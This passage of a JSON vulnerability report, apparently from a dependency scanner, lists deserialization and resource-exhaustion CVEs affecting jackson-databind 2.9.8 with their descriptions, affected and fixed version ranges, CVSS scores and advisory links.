caucho-quercus)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10673"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10673"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.4"]}],"title":"CVE-2020-10673/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-24616"]}],"cve":"CVE-2020-24616","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:14:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-24616"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Code Injection in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Code Injection in jackson-databind This project contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.6"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.6"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24616"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24616"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.6"]}],"title":"CVE-2020-24616/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11620"]}],"cve":"CVE-2020-11620","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T20:19:02","ids":[{"system_name":"CVE Record","text":"CVE-2020-11620"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"NetApp Advisory","text":"ntap-20200511-0004"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11620"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11620"},{"summary":"NetApp Advisory ntap-20200511-0004","url":"https://security.netapp.com/advisory/ntap-20200511-0004"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11620/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14060"]}],"cve":"CVE-2020-14060","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:46","ids":[{"system_name":"CVE Record","text":"CVE-2020-14060"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14060"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14060"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14060/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42003"]}],"cve":"CVE-2022-42003","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-10-03T00:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-42003"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"Gentoo Advisory","text":"glsa-202210-21"},{"system_name":"NetApp Advisory","text":"ntap-20221124-0004"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in Jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in Jackson-databind In FasterXML jackson-databind 2.4.0-rc1 until 2.12.7.1 and in 2.13.x before 2.13.4.2 resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. This was patched in 2.12.7.1, 2.13.4.2, and 2.14.0.  Commits that introduced vulnerable code are  https://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45, https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1, and https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc.  Fix commits are https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea and https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.4.0-rc1|<2.12.7.1"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.12.7.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42003"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42003"},{"summary":"Gentoo Advisory glsa-202210-21","url":"https://security.gentoo.org/glsa/202210-21"},{"summary":"NetApp Advisory ntap-20221124-0004","url":"https://security.netapp.com/advisory/ntap-20221124-0004"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.4.0-rc1|<2.12.7.1"]}],"title":"CVE-2022-42003/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36184"]}],"cve":"CVE-2020-36184","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:26","ids":[{"system_name":"CVE Record","text":"CVE-2020-36184"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36184"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36184"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36184/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14195"]}],"cve":"CVE-2020-14195","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:43","ids":[{"system_name":"CVE Record","text":"CVE-2020-14195"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14195"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14195"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14195/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9548"]}],"cve":"CVE-2020-9548","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:01","ids":[{"system_name":"CVE Record","text":"CVE-2020-9548"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9548"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9548"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9548/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9547"]}],"cve":"CVE-2020-9547","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-9547"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 